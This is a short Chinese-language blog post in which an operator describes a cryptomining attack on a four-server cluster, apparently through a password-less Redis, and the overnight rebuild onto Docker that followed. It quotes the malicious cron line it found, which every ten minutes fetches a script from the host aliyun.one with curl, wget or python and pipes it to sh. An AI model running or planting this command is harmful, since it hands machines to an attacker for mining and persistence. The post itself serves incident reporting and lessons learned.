一次服务器集群被攻击中的教训

2020 祝定不是一个平凡的年，昨天我一朋友他们公司开年会，喊我一起去热闹热闹，结果刚吃上饭，喝了二两，然后接领导给我打电话，然后我看了下一下几十条报警短信，知道服务被攻击挖矿了,是我们的一个小集群(4台服务)，我估计肯定 是redis服务器着了，因为之前测试环境的时候我们也没到过，然后报着jiao性的心理就没有修改，因为那集群是我拼盘的时候就已经在了，领导也没要求升级啥的，redis明显没有密码，应该是跳入了服务器的内网，把我们其它几台服务都给端了，资源，CPU,负载，内存很高，整个有10来个域名，网站 APP 小程序各种访问不了各种炸，赶紧的打车回公司，认真想了下，决定把所有的服务器都重装，随便把所有的都换成docker上，就这样奋斗了一个通宵，早上业务数据全面恢复，真的太累了好久都没有通宵了

黑客的手段基本就是计划任务:/var/spool/cron/里面有没有数据 ，一般可以用crontab -e 来修改

恶意脚本路径：/var/spool/cron/cdsbxmt
恶意脚本标签：远程加载命令,恶意定时任务持久化

 

　　基本是这种

*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh

　　总结 还是不要抱侥幸心里，架构还是要足够清晰，这样不容易挖坑